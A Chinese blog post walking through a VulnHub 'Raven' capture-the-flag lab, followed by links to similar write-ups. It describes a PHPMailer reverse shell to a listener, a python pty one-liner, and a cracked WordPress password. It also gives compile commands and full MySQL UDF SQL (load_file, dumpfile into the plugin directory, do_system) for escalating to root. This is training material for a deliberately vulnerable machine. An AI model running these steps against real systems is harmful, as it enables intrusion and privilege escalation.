【VulnHub】Raven靶机的渗透测试 打靶记录

最新推荐文章于 2023-05-08 23:11:53 发布
最新推荐文章于 2023-05-08 23:11:53 发布
阅读量282 收藏 1
点赞数 2
文章标签: linux python 数据库 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_70045024/article/details/127206447
版权

准备环境

kali-linux ip 172.16.10.149

Raven 虚拟机  链接:https://pan.baidu.com/s/10_nfsDmB2Zu20P85GxA8wg?pwd=ic9t 
提取码:ic9t 

渗透工具

kali虚拟机

nmap 端口扫描工具

后台扫描工具

渗透流程

1.信息收集

 使用arp-scan确定目标靶机

 这里1的ip地址是我们的真实机 也就是我们的本地

 2的ip地址是我们的wm网关

 3,4的ip地址目前未知 我们分别ping一下这两个地址 发现144的地址是可以跟我们通信而254跟我 们不能通信 这里确认靶机地址为172.16.10.144

使用nmap扫描查看目标靶机端口开放情况 

nmap扫描结果目标端口开放22,80端口

22端口 openssh 6.7p1

80端口 apache/2.4.10

rpc端口 111

linux内核 3.x|4.x linux内核3.2 — 4.9

dirsearch目录爆破

 工具使用完毕 有80端口 当然是web服务 直接浏览器伺候 随便把爆破得目录也伺候了 

通过F12查看得前端可以显示得源代码找到第一个flag

 访问wordpress目录看到了

(我看到这个说实话是很开心得 看到wordpress思路一下就来了 先放一边继续信息收集) 

 

 收集到这里不收集了 phpMailer <5.2.18 有个漏洞 我们去找一个那个邮件页面 然后直接找个exp 干他

思路清晰 

2.漏洞利用

漏洞phpMailer 直接kali searchsploit 

我个人习惯用python的脚本 其他得没用过

 搞出来 然后看看脚本  构造一下脚本修改一下target = http://your ip:contact.php 

backdoor改成下面的路径后面的一样的文件名

payload里面的监听地址 172.16.10.149 4444

网站绝对路径我们在上面信息收集过 也修改一下/var/www/html/bai1.php

 运行脚本

 kali开启监听 

浏览器访问刚刚生成的文件 

 反弹监听成功 

 我们用python来获取个回显

python -c 'import pty; pty.spawn("/bin/bash")'

 find查找一下flag

 cat一下flag2 flag4是root权限 等下要提权 我们先去找一下flag3

 再次信息收集 

 经验这个是数据库配置文件

 发现数据库账号密码 连它

进入wordpress库

查表 

查字段 

 发现两个wordprsee账户 密码md5加密 找个网址解密一下 然后登入wordprsee后台看下有没有flag3

michael md5解密没有解出来 

steven 密码pink84

登入wordpress发现flag3

 这里这个wordpress访问要在你的本机hosts里面最下面加上一条 172.16.10.144 raven.local 就可以正常访问 flag3找到了 这里最后一个flag4 要提到root权限 

 find查找一下有没有sudo 命令 到这里我准备用www-data直接sudo提权的 但是我没有www-data的密码 这里我就想到了数据库 数据库是root权限的 所以我们用udf提权 得到数据库版本

直接kali  searchsploit udf

 扒下来 直接gcc编译 

gcc -g -c 1518.c

gcc -g -shared -o 1518.so 1518.o -lc

开个python 简易web服务 去目标机去到tmp目录wget下载 

 连接数据库 进入mysql库

use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/1518.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
【其中dumpfile的路径我是默认路径如果有改动是要找到musql路径的】
create function do_system returns integer soname '1518.so';

提权成功 去到root目录查看flag4

 

靶机Raven渗透结束 

感谢各位看到最后 谢谢 

给我吧唧一下
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
oscp推荐的训练靶机raven2渗透过程
07-05
oscp推荐的训练靶机raven2渗透过程
2021-12-03 kali渗透----Raven靶机
夕阳的街道的博客
12-03 2593
本文章仅供学习和参考! 欢迎交流~ 一、实验题目:kali渗透----Raven靶机 二、实验内容: 1. 信息收集 2. ssh爆破 3. 绕过限制sudo提权 4. wpscan扫描worpress cms 5. PHPMailer远程代码执行getshell 三、环境准备: 1. kali虚拟机:(IP:192.168.112.130) 2. Raven靶机:(IP:192.168.112.137) 四、实验步骤: 1. 信息收集: (1)端口扫描.
vulnhub-raven
weixin_50683638的博客
12-29 2300
vulnhub-raven 靶机下载:https://download.vulnhub.com/raven/Raven.ova kali:nat模式,靶机也nat模式 探测主机 扫描端口 访问网站,查看源代码,看到service.html访问看到flag1 dirb http://192.168.11.128看到wordpress wpscan --url http://192.168.11.128/wordpress -e u hydra -l michael -P rockyou.txt 192
VulnHub-Raven
热门推荐
江左盟的博客
04-06 1万+
信息收集 使用nmap --min-rate 10000 -A 192.168.58.135 --script=vuln扫描目标主机,如图: 部分关键信息如下: Nmap scan report for 192.168.58.135 Host is up (0.00054s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8
靶机Raven
weixin_43940853的博客
11-10 1105
大致看了看别人的wp,感觉这个靶机坐下来还是能获得不少东西的 大致分为两种方法,先来第一种比较简单的,第二种可能需要较长时间消化 kali : 192.168.230.224 target : 192.168.230.225 第一种方法(扫描->发现web服务->得知wordpress服务->wpscan扫描->发现用户名密码->用hydra爆破ssh(这里直接试出来...
vulnhub靶场--Raven靶场
zzzzzzkeai的博客
12-08 334
vulnhub靶场--Raven靶场
recon-raven:渗透测试和漏洞赏金的侦察工具
04-27
渗透测试和漏洞赏金的侦察工具 如何安装? #> ./install.sh 用法 #> rraven 或者 #> ruby rranven.rb 支持功能和待办事项清单 子域发现(模糊) 子域接管漏洞 子域ping(连接检查) 端口扫描和子域端口扫描 ...
Raven:Javascript框架
05-05
掠夺Raven是一个创造性的编码框架,在Javascript环境中结合了在openFrameworks,Processing和Flash中看到的意识形态。 类按类型分开,因此可以轻松选择项目中需要框架的哪些部分。 虽然仍处于青春期,但正在进行重大...
raven-for-redux:用于Redux的Raven中间件
02-05
将每个调度动作的类型记录为Rreadcrumbs,并将您的上一个动作和当前Redux状态作为附加上下文。 受启发,但略有。 安装 npm install --save raven-for-redux 用法 浏览器 // store.js import Raven from "raven-js" ...
nest:Raven的软件包管理器
02-04
建立依赖rustup,提供最新的每晚工具链建筑巢编译Nest非常简单: cargo build --all运行测试如果要确保在编译Nest时一切正常,可以运行测试: cargo test --all奔跑的巢您不应该在不受保护的环境中运行Nest,因为...
VulnHub-Raven-靶机渗透学习
嗯嗯呐的博客
11-11 725
靶机地址:https://www.vulnhub.com/entry/raven-2,269/ 靶机描述:Raven 2 is an intermediate level boot2root VM. There are four flags to capture. After multiple breaches, Raven Security has taken extra steps to harden their web server to prevent hackers from getting in
Raven: 2靶机入侵
weixin_30477797的博客
01-30 926
0x00 前言 Raven 2是一个中等难度的boot2root虚拟靶机。有四个flag需要找出。在多次被攻破后,Raven Security采取了额外措施来增强他们的网络服务器安全以防止黑客入侵。 靶机下载地址:https://download.vulnhub.com/raven/Raven2.ova 0x01 存活主机 1.在windows上的scan ports工具对目标整个网段(...
Raven 2 靶机渗透
banacyo14206的博客
08-24 840
0X00 前言 Raven 2中一共有四个flag,Raven 2是一个中级boot2root VM。有四个标志要捕获。在多次破坏之后,Raven Security采取了额外措施来强化他们的网络服务器,以防止黑客进入。 靶机下载地址:https://download.vulnhub.com/raven/Raven2.ova 提权辅助工具LinEnum下载:https://do...
VulnHubRaven: 2靶机渗透测试
大方子
06-28 3956
总结和思考: 使用netdiscover探测内网存活主机 PHPMailer的漏洞反弹得到shell Python版的EXP修改 查看wordpress的wp-config.php配置文件得到数据库账号密码 MySQL版本 <= 7.14 5.6.32 5.5.51 可以利用UDF提权 KALI对EXP的编译 给程序chmod u+s 增加suid权限,可以以root权限运...
kali渗透综合靶机(十)--Raven靶机
W小哥
03-28 2006
一、靶机下载 下载链接:https://download.vulnhub.com/raven/Raven.ova 二、Raven靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 kali IP:192.168.212.129 靶机IP:192.168.212.4 1、主机发现 nmap ...
靶机渗透-Vulnhub-Raven
dahege666的博客
08-18 167
靶机raven IP:192.168.239.136 攻击机:Kali IP:192.168..239.131 1、Nmap探测目标端口和服务 2、先访问80端口,从web服务开始 3、菜单栏中BLOG路径为wordpress点击,可以判断是wordpressCMS 4、先用wpscan扫一下,wpscan --url http://192.168.239.136/wordpress/ -e u 得到两个用户 5、爆破两个用户的密码,和爆破ssh密码 最后爆破...
OSCP  Raven 靶机渗透
Shadow的博客
04-01 295
Raven靶机渗透 目标:得到root权限 作者:shadow 时间:2021-04-01 请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。 一、信息收集 netdiscover -i eth0 Raven主机ip为172.16.1.17 nmap 查询开放端口 nmap -p- -A 172.16.1.17 查询到主机开放了80端口,打开浏览器看.
【甄选靶场】Vulnhub百个项目渗透——项目三:Raven-2(服务利用,udf提权)
人间体佐菲的博客
09-05 807
【甄选靶场】Vulnhub百个项目渗透——项目三:Raven-2(服务利用,udf提权)
3-Raven2百个靶机渗透(精写-思路为主)
bmxch的博客
05-08 801
思路清晰先说步骤:1.信息收集,收集到应有的靶机可利用端口。2.用收集到的信息尝试爆破ssh,如果信息足够可用拿到普通用户,最好能一次拿到root3.根据系统版本搜索exp(常规提权),拿到root的shell4.对mysql udf的渗透、提权,思路为主。以上就是对这个靶机渗透总结了,这里用了mysql udf提权,这个方法现在已经不常用了5.1以后的版本基本无法使用,但是思路是永不过期的,希望大家能好好学习思路,而不是花里胡哨的漏洞偏门。
vulnhub靶机——raven: 2
最新发布
09-03
- *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

给我吧唧一下

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值